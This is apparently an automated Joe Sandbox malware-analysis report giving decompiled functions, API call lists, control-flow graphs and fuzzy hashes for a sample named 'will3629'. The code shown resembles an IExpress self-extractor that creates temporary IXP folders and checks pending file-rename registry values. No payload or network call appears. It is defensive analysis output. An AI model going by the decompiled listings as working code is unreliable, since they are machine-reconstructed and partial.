                                                0x00ac544c
                                                0x00ac544c
                                                0x00ac5452
                                                0x00ac545a
                                                0x00000000
                                                0x00000000
                                                0x00ac545e
                                                0x00ac545f
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC171E: _vsnprintf.MSVCRT ref: 00AC1750
                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC53FB
                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5402
                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC541F
                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC542B
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5434
                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5452
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                • API String ID: 1082909758-2966903483
                                                • Opcode ID: e3e8e5b75d70524253aee80418fd5d2b741ed1fa357f8dcf1a64801032c1faf8
                                                • Instruction ID: 2758eafdc06193fe2b426d95c0eb109f5a1a0eea401db61596a348497094fb1b
                                                • Opcode Fuzzy Hash: e3e8e5b75d70524253aee80418fd5d2b741ed1fa357f8dcf1a64801032c1faf8
                                                • Instruction Fuzzy Hash: 94110171B0060867E324DB769D49FAF36AEEBD6355F02012DF646D2291CE74898386A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 522 ac5467-ac5484 523 ac551c-ac5528 call ac1680 522->523 524 ac548a-ac5490 call ac53a1 522->524 527 ac552d-ac5539 call ac58c8 523->527 528 ac5495-ac5497 524->528 537 ac554d-ac5552 527->537 538 ac553b-ac5545 CreateDirectoryA 527->538 530 ac549d-ac54c0 call ac1781 528->530 531 ac5581-ac5583 528->531 539 ac550c-ac551a call ac658a 530->539 540 ac54c2-ac54d8 GetSystemInfo 530->540 534 ac558d-ac559d call ac6ce0 531->534 544 ac5554-ac5557 call ac597d 537->544 545 ac5585-ac558b 537->545 542 ac5577-ac557c call ac6285 538->542 543 ac5547 538->543 539->527 546 ac54fe 540->546 547 ac54da-ac54dd 540->547 542->531 543->537 553 ac555c-ac555e 544->553 545->534 554 ac5503-ac5507 call ac658a 546->554 551 ac54df-ac54e2 547->551 552 ac54f7-ac54fc 547->552 557 ac54e4-ac54e7 551->557 558 ac54f0-ac54f5 551->558 552->554 553->545 559 ac5560-ac5566 553->559 554->539 557->539 561 ac54e9-ac54ee 557->561 558->554 559->531 562 ac5568-ac5575 RemoveDirectoryA 559->562 561->554 562->531
                                                C-Code - Quality: 75%
                                                			E00AC5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				struct _SYSTEM_INFO _v304;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t10;
                                                				void* _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				void* _t20;
                                                				signed int _t26;
                                                				void* _t28;
                                                				void* _t29;
                                                				CHAR* _t48;
                                                				signed int _t49;
                                                				intOrPtr _t61;
                                                
                                                				_t10 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t10 ^ _t49;
                                                				_push(__ecx);
                                                				if(__edx == 0) {
                                                					_t48 = 0xac91e4;
                                                					_t42 = 0x104;
                                                					E00AC1680(0xac91e4, 0x104);
                                                					L14:
                                                					_t13 = E00AC58C8(_t48); // executed
                                                					if(_t13 != 0) {
                                                						L17:
                                                						_t42 = _a4;
                                                						if(_a4 == 0) {
                                                							L23:
                                                							 *0xac9124 = 0;
                                                							_t14 = 1;
                                                							L24:
                                                							return E00AC6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                						}
                                                						_t16 = E00AC597D(_t48, _t42, 1, 0); // executed
                                                						if(_t16 != 0) {
                                                							goto L23;
                                                						}
                                                						_t61 =  *0xac8a20; // 0x0
                                                						if(_t61 != 0) {
                                                							 *0xac8a20 = 0;
                                                							RemoveDirectoryA(_t48);
                                                						}
                                                						L22:
                                                						_t14 = 0;
                                                						goto L24;
                                                					}
                                                					if(CreateDirectoryA(_t48, 0) == 0) {
                                                						 *0xac9124 = E00AC6285();
                                                						goto L22;
                                                					}
                                                					 *0xac8a20 = 1;
                                                					goto L17;
                                                				}
                                                				_t42 =  &_v268;
                                                				_t20 = E00AC53A1(__ecx,  &_v268); // executed
                                                				if(_t20 == 0) {
                                                					goto L22;
                                                				}
                                                				_push(__ecx);
                                                				_t48 = 0xac91e4;
                                                				E00AC1781(0xac91e4, 0x104, __ecx,  &_v268);
                                                				if(( *0xac9a34 & 0x00000020) == 0) {
                                                					L12:
                                                					_t42 = 0x104;
                                                					E00AC658A(_t48, 0x104, 0xac1140);
                                                					goto L14;
                                                				}
                                                				GetSystemInfo( &_v304);
                                                				_t26 = _v304.dwOemId & 0x0000ffff;
                                                				if(_t26 == 0) {
                                                					_push("i386");
                                                					L11:
                                                					E00AC658A(_t48, 0x104);
                                                					goto L12;
                                                				}
                                                				_t28 = _t26 - 1;
                                                				if(_t28 == 0) {
                                                					_push("mips");
                                                					goto L11;
                                                				}
                                                				_t29 = _t28 - 1;
                                                				if(_t29 == 0) {
                                                					_push("alpha");
                                                					goto L11;
                                                				}
                                                				if(_t29 != 1) {
                                                					goto L12;
                                                				}
                                                				_push("ppc");
                                                				goto L11;
                                                			}




















                                                0x00ac5472
                                                0x00ac5479
                                                0x00ac5481
                                                0x00ac5484
                                                0x00ac551c
                                                0x00ac5521
                                                0x00ac5528
                                                0x00ac552d
                                                0x00ac552f
                                                0x00ac5539
                                                0x00ac554d
                                                0x00ac554d
                                                0x00ac5552
                                                0x00ac5585
                                                0x00ac5585
                                                0x00ac558b
                                                0x00ac558d
                                                0x00ac559d
                                                0x00ac559d
                                                0x00ac5557
                                                0x00ac555e
                                                0x00000000
                                                0x00000000
                                                0x00ac5560
                                                0x00ac5566
                                                0x00ac5569
                                                0x00ac556f
                                                0x00ac556f
                                                0x00ac5581
                                                0x00ac5581
                                                0x00000000
                                                0x00ac5581
                                                0x00ac5545
                                                0x00ac557c
                                                0x00000000
                                                0x00ac557c
                                                0x00ac5547
                                                0x00000000
                                                0x00ac5547
                                                0x00ac548a
                                                0x00ac5490
                                                0x00ac5497
                                                0x00000000
                                                0x00000000
                                                0x00ac549d
                                                0x00ac54ab
                                                0x00ac54b4
                                                0x00ac54c0
                                                0x00ac550c
                                                0x00ac5511
                                                0x00ac5515
                                                0x00000000
                                                0x00ac5515
                                                0x00ac54c9
                                                0x00ac54d6
                                                0x00ac54d8
                                                0x00ac54fe
                                                0x00ac5503
                                                0x00ac5507
                                                0x00000000
                                                0x00ac5507
                                                0x00ac54da
                                                0x00ac54dd
                                                0x00ac54f7
                                                0x00000000
                                                0x00ac54f7
                                                0x00ac54df
                                                0x00ac54e2
                                                0x00ac54f0
                                                0x00000000
                                                0x00ac54f0
                                                0x00ac54e7
                                                0x00000000
                                                0x00000000
                                                0x00ac54e9
                                                0x00000000

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC54C9
                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC553D
                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC556F
                                                  • Part of subcall function 00AC53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC53FB
                                                  • Part of subcall function 00AC53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5402
                                                  • Part of subcall function 00AC53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC541F
                                                  • Part of subcall function 00AC53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC542B
                                                  • Part of subcall function 00AC53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00AC5434
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                • API String ID: 1979080616-3388087672
                                                • Opcode ID: f313f87ca06fd3b0a843cd1f7867843372ee8bd920013f6e3dfe4a7c11b82d9d
                                                • Instruction ID: 32f52e4863755af401ab460e0d8796cd9a927a20bcf225d8837f95b1dd162740
                                                • Opcode Fuzzy Hash: f313f87ca06fd3b0a843cd1f7867843372ee8bd920013f6e3dfe4a7c11b82d9d
                                                • Instruction Fuzzy Hash: 2D310A71F00A085BCB14DBB59D45F7F77EBBB91344F1B012EB40692251DB74DE828691
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 563 ac256d-ac257d 564 ac2622-ac2627 call ac24e0 563->564 565 ac2583-ac2589 563->565 572 ac2629-ac262f 564->572 567 ac25e8-ac2607 RegOpenKeyExA 565->567 568 ac258b 565->568 569 ac2609-ac2620 RegQueryInfoKeyA 567->569 570 ac25e3-ac25e6 567->570 568->572 573 ac2591-ac2595 568->573 574 ac25d1-ac25dd RegCloseKey 569->574 570->572 573->572 575 ac259b-ac25ba RegOpenKeyExA 573->575 574->570 575->570 576 ac25bc-ac25cb RegQueryValueExA 575->576 576->574
                                                C-Code - Quality: 86%
                                                			E00AC256D(signed int __ecx) {
                                                				int _v8;
                                                				void* _v12;
                                                				signed int _t13;
                                                				signed int _t19;
                                                				long _t24;
                                                				void* _t26;
                                                				int _t31;
                                                				void* _t34;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t13 = __ecx & 0x0000ffff;
                                                				_t31 = 0;
                                                				if(_t13 == 0) {
                                                					_t31 = E00AC24E0(_t26);
                                                				} else {
                                                					_t34 = _t13 - 1;
                                                					if(_t34 == 0) {
                                                						_v8 = 0;
                                                						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                							goto L7;
                                                						} else {
                                                							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                							goto L6;
                                                						}
                                                						L12:
                                                					} else {
                                                						if(_t34 > 0 && __ecx <= 3) {
                                                							_v8 = 0;
                                                							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                							if(_t24 == 0) {
                                                								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                								L6:
                                                								asm("sbb eax, eax");
                                                								_v8 = _v8 &  !( ~_t19);
                                                								RegCloseKey(_v12); // executed
                                                							}
                                                							L7:
                                                							_t31 = _v8;
                                                						}
                                                					}
                                                				}
                                                				return _t31;
                                                				goto L12;
                                                			}











                                                0x00ac2572
                                                0x00ac2573
                                                0x00ac2575
                                                0x00ac2578
                                                0x00ac257d
                                                0x00ac2627
                                                0x00ac2583
                                                0x00ac2586
                                                0x00ac2589
                                                0x00ac25eb
                                                0x00ac2607
                                                0x00000000
                                                0x00ac2609
                                                0x00ac261a
                                                0x00000000
                                                0x00ac261a
                                                0x00000000
                                                0x00ac258b
                                                0x00ac258b
                                                0x00ac259e
                                                0x00ac25b2
                                                0x00ac25ba
                                                0x00ac25cb
                                                0x00ac25d1
                                                0x00ac25d6
                                                0x00ac25da
                                                0x00ac25dd
                                                0x00ac25dd
                                                0x00ac25e3
                                                0x00ac25e3
                                                0x00ac25e3
                                                0x00ac258b
                                                0x00ac2589
                                                0x00ac262f
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00AC4096,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?), ref: 00AC25B2
                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?,00AC4096), ref: 00AC25CB
                                                • RegCloseKey.KERNELBASE(?,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?,00AC4096), ref: 00AC25DD
                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00AC4096,00AC4096,?,00AC1ED3,00000001,00000000,?,?,00AC4137,?), ref: 00AC25FF
                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00AC4096,00000000,00000000,00000000,00000000,?,00AC1ED3,00000001,00000000), ref: 00AC261A
                                                Strings
                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00AC25F5
                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 00AC25A8
                                                • PendingFileRenameOperations, xrefs: 00AC25C3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: OpenQuery$CloseInfoValue
                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                • API String ID: 2209512893-559176071
                                                • Opcode ID: 5187fc1e69bc1d9db7cd39e7e2a12aa8327bd7f3dc20cf363a188e7da9c78488
                                                • Instruction ID: 96caaa8eccc07b831d1930d034ae1ba762df96a95b81623c1d79c7ad5da0da86
                                                • Opcode Fuzzy Hash: 5187fc1e69bc1d9db7cd39e7e2a12aa8327bd7f3dc20cf363a188e7da9c78488
                                                • Instruction Fuzzy Hash: 3A118F35A0222CBBAB20DB919C0DFFBBE7CEF117A5F124059B809A2000DA344E45D7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 577 ac6a60-ac6a91 call ac7155 call ac7208 GetStartupInfoW 583 ac6a93-ac6aa2 577->583 584 ac6abc-ac6abe 583->584 585 ac6aa4-ac6aa6 583->585 588 ac6abf-ac6ac5 584->588 586 ac6aaf-ac6aba Sleep 585->586 587 ac6aa8-ac6aad 585->587 586->583 587->588 589 ac6ac7-ac6acf _amsg_exit 588->589 590 ac6ad1-ac6ad7 588->590 591 ac6b0b-ac6b11 589->591 592 ac6ad9-ac6ae9 call ac6c3f 590->592 593 ac6b05 590->593 595 ac6b2e-ac6b30 591->595 596 ac6b13-ac6b24 _initterm 591->596 597 ac6aee-ac6af2 592->597 593->591 598 ac6b3b-ac6b42 595->598 599 ac6b32-ac6b39 595->599 596->595 597->591 602 ac6af4-ac6b00 597->602 600 ac6b44-ac6b51 call ac7060 598->600 601 ac6b67-ac6b71 598->601 599->598 600->601 610 ac6b53-ac6b65 600->610 604 ac6b74-ac6b79 601->604 605 ac6c39-ac6c3e call ac724d 602->605 608 ac6b7b-ac6b7d 604->608 609 ac6bc5-ac6bc8 604->609 614 ac6b7f-ac6b81 608->614 615 ac6b94-ac6b98 608->615 611 ac6bca-ac6bd3 609->611 612 ac6bd6-ac6be3 _ismbblead 609->612 610->601 611->612 618 ac6be9-ac6bed 612->618 619 ac6be5-ac6be6 612->619 614->609 620 ac6b83-ac6b85 614->620 616 ac6b9a-ac6b9e 615->616 617 ac6ba0-ac6ba2 615->617 621 ac6ba3-ac6bbc call ac2bfb 616->621 617->621 618->604 623 ac6c1e-ac6c25 618->623 619->618 620->615 624 ac6b87-ac6b8a 620->624 621->623 630 ac6bbe-ac6bbf exit 621->630 626 ac6c27-ac6c2d _cexit 623->626 627 ac6c32 623->627 624->615 628 ac6b8c-ac6b92 624->628 626->627 627->605 628->620 630->609
                                                C-Code - Quality: 51%
                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t25;
                                                				signed int _t26;
                                                				signed int _t29;
                                                				int _t30;
                                                				signed int _t37;
                                                				signed char _t41;
                                                				signed int _t53;
                                                				signed int _t54;
                                                				intOrPtr _t56;
                                                				signed int _t58;
                                                				signed int _t59;
                                                				intOrPtr* _t60;
                                                				void* _t62;
                                                				void* _t67;
                                                				void* _t68;
                                                
                                                				E00AC7155();
                                                				_push(0x58);
                                                				_push(0xac72b8);
                                                				E00AC7208(__ebx, __edi, __esi);
                                                				 *(_t62 - 0x20) = 0;
                                                				GetStartupInfoW(_t62 - 0x68);
                                                				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                				_t53 = 0;
                                                				while(1) {
                                                					asm("lock cmpxchg [edx], ecx");
                                                					if(0 == 0) {
                                                						break;
                                                					}
                                                					if(0 != _t56) {
                                                						Sleep(0x3e8);
                                                						continue;
                                                					} else {
                                                						_t58 = 1;
                                                						_t53 = 1;
                                                					}
                                                					L7:
                                                					_t67 =  *0xac88b0 - _t58; // 0x2
                                                					if(_t67 != 0) {
                                                						__eflags =  *0xac88b0; // 0x2
                                                						if(__eflags != 0) {
                                                							 *0xac81e4 = _t58;
                                                							goto L13;
                                                						} else {
                                                							 *0xac88b0 = _t58;
                                                							_t37 = E00AC6C3F(0xac10b8, 0xac10c4); // executed
                                                							__eflags = _t37;
                                                							if(__eflags == 0) {
                                                								goto L13;
                                                							} else {
                                                								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                								_t30 = 0xff;
                                                							}
                                                						}
                                                					} else {
                                                						_push(0x1f);
                                                						L00AC6FF4();
                                                						L13:
                                                						_t68 =  *0xac88b0 - _t58; // 0x2
                                                						if(_t68 == 0) {
                                                							_push(0xac10b4);
                                                							_push(0xac10ac);
                                                							L00AC7202();
                                                							 *0xac88b0 = 2;
                                                						}
                                                						if(_t53 == 0) {
                                                							 *0xac88ac = 0;
                                                						}
                                                						_t71 =  *0xac88b4;
                                                						if( *0xac88b4 != 0 && E00AC7060(_t71, 0xac88b4) != 0) {
                                                							_t60 =  *0xac88b4; // 0x0
                                                							 *0xaca288(0, 2, 0);
                                                							 *_t60();
                                                						}
                                                						_t25 = __imp___acmdln; // 0x76665b9c
                                                						_t59 =  *_t25;
                                                						 *(_t62 - 0x1c) = _t59;
                                                						_t54 =  *(_t62 - 0x20);
                                                						while(1) {
                                                							_t41 =  *_t59;
                                                							if(_t41 > 0x20) {
                                                								goto L32;
                                                							}
                                                							if(_t41 != 0) {
                                                								if(_t54 != 0) {
                                                									goto L32;
                                                								} else {
                                                									while(_t41 != 0 && _t41 <= 0x20) {
                                                										_t59 = _t59 + 1;
                                                										 *(_t62 - 0x1c) = _t59;
                                                										_t41 =  *_t59;
                                                									}
                                                								}
                                                							}
                                                							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                								_t29 = 0xa;
                                                							} else {
                                                								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                							}
                                                							_push(_t29);
                                                							_t30 = E00AC2BFB(0xac0000, 0, _t59); // executed
                                                							 *0xac81e0 = _t30;
                                                							__eflags =  *0xac81f8;
                                                							if( *0xac81f8 == 0) {
                                                								exit(_t30); // executed
                                                								goto L32;
                                                							}
                                                							__eflags =  *0xac81e4;
                                                							if( *0xac81e4 == 0) {
                                                								__imp___cexit();
                                                								_t30 =  *0xac81e0; // 0x80070002
                                                							}
                                                							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                							goto L40;
                                                							L32:
                                                							__eflags = _t41 - 0x22;
                                                							if(_t41 == 0x22) {
                                                								__eflags = _t54;
                                                								_t15 = _t54 == 0;
                                                								__eflags = _t15;
                                                								_t54 = 0 | _t15;
                                                								 *(_t62 - 0x20) = _t54;
                                                							}
                                                							_t26 = _t41 & 0x000000ff;
                                                							__imp___ismbblead(_t26);
                                                							__eflags = _t26;
                                                							if(_t26 != 0) {
                                                								_t59 = _t59 + 1;
                                                								__eflags = _t59;
                                                								 *(_t62 - 0x1c) = _t59;
                                                							}
                                                							_t59 = _t59 + 1;
                                                							 *(_t62 - 0x1c) = _t59;
                                                						}
                                                					}
                                                					L40:
                                                					return E00AC724D(_t30);
                                                				}
                                                				_t58 = 1;
                                                				__eflags = 1;
                                                				goto L7;
                                                			}


















                                                0x00ac6a60
                                                0x00ac6a6a
                                                0x00ac6a6c
                                                0x00ac6a71
                                                0x00ac6a78
                                                0x00ac6a7f
                                                0x00ac6a85
                                                0x00ac6a8e
                                                0x00ac6a91
                                                0x00ac6a93
                                                0x00ac6a9c
                                                0x00ac6aa2
                                                0x00000000
                                                0x00000000
                                                0x00ac6aa6
                                                0x00ac6ab4
                                                0x00000000
                                                0x00ac6aa8
                                                0x00ac6aaa
                                                0x00ac6aab
                                                0x00ac6aab
                                                0x00ac6abf
                                                0x00ac6abf
                                                0x00ac6ac5
                                                0x00ac6ad1
                                                0x00ac6ad7
                                                0x00ac6b05
                                                0x00000000
                                                0x00ac6ad9
                                                0x00ac6ad9
                                                0x00ac6ae9
                                                0x00ac6af0
                                                0x00ac6af2
                                                0x00000000
                                                0x00ac6af4
                                                0x00ac6af4
                                                0x00ac6afb
                                                0x00ac6afb
                                                0x00ac6af2
                                                0x00ac6ac7
                                                0x00ac6ac7
                                                0x00ac6ac9
                                                0x00ac6b0b
                                                0x00ac6b0b
                                                0x00ac6b11
                                                0x00ac6b13
                                                0x00ac6b18
                                                0x00ac6b1d
                                                0x00ac6b24
                                                0x00ac6b24
                                                0x00ac6b30
                                                0x00ac6b39
                                                0x00ac6b39
                                                0x00ac6b3b
                                                0x00ac6b42
                                                0x00ac6b57
                                                0x00ac6b5f
                                                0x00ac6b65
                                                0x00ac6b65
                                                0x00ac6b67
                                                0x00ac6b6c
                                                0x00ac6b6e
                                                0x00ac6b71
                                                0x00ac6b74
                                                0x00ac6b74
                                                0x00ac6b79
                                                0x00000000
                                                0x00000000
                                                0x00ac6b7d
                                                0x00ac6b81
                                                0x00000000
                                                0x00000000
                                                0x00ac6b83
                                                0x00ac6b8c
                                                0x00ac6b8d
                                                0x00ac6b90
                                                0x00ac6b90
                                                0x00ac6b83
                                                0x00ac6b81
                                                0x00ac6b94
                                                0x00ac6b98
                                                0x00ac6ba2
                                                0x00ac6b9a
                                                0x00ac6b9a
                                                0x00ac6b9a
                                                0x00ac6ba3
                                                0x00ac6bab
                                                0x00ac6bb0
                                                0x00ac6bb5
                                                0x00ac6bbc
                                                0x00ac6bbf
                                                0x00000000
                                                0x00ac6bbf
                                                0x00ac6c1e
                                                0x00ac6c25
                                                0x00ac6c27
                                                0x00ac6c2d
                                                0x00ac6c2d
                                                0x00ac6c32
                                                0x00000000
                                                0x00ac6bc5
                                                0x00ac6bc5
                                                0x00ac6bc8
                                                0x00ac6bcc
                                                0x00ac6bce
                                                0x00ac6bce
                                                0x00ac6bd1
                                                0x00ac6bd3
                                                0x00ac6bd3
                                                0x00ac6bd6
                                                0x00ac6bda
                                                0x00ac6be1
                                                0x00ac6be3
                                                0x00ac6be5
                                                0x00ac6be5
                                                0x00ac6be6
                                                0x00ac6be6
                                                0x00ac6be9
                                                0x00ac6bea
                                                0x00ac6bea
                                                0x00ac6b74
                                                0x00ac6c39
                                                0x00ac6c3e
                                                0x00ac6c3e
                                                0x00ac6abe
                                                0x00ac6abe
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 00AC7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00AC7182
                                                  • Part of subcall function 00AC7155: GetCurrentProcessId.KERNEL32 ref: 00AC7191
                                                  • Part of subcall function 00AC7155: GetCurrentThreadId.KERNEL32 ref: 00AC719A
                                                  • Part of subcall function 00AC7155: GetTickCount.KERNEL32 ref: 00AC71A3
                                                  • Part of subcall function 00AC7155: QueryPerformanceCounter.KERNEL32(?), ref: 00AC71B8
                                                • GetStartupInfoW.KERNEL32(?,00AC72B8,00000058), ref: 00AC6A7F
                                                • Sleep.KERNEL32(000003E8), ref: 00AC6AB4
                                                • _amsg_exit.MSVCRT ref: 00AC6AC9
                                                • _initterm.MSVCRT ref: 00AC6B1D
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00AC6B49
                                                • exit.KERNELBASE ref: 00AC6BBF
                                                • _ismbblead.MSVCRT ref: 00AC6BDA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                • String ID:
                                                • API String ID: 836923961-0
                                                • Opcode ID: 687b4268e958ae1a85e04ebfd286331deadce06844e2c056c08e8bcf5abc8ea6
                                                • Instruction ID: 85fe7617c472b2f762c388de8b826c33784854215e4b54bb1e4bded2bcbf6731
                                                • Opcode Fuzzy Hash: 687b4268e958ae1a85e04ebfd286331deadce06844e2c056c08e8bcf5abc8ea6
                                                • Instruction Fuzzy Hash: 8B41C1719882259BDB21DBA8DD05FBA77F4FB44760F17412EE841E7291CF784C428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
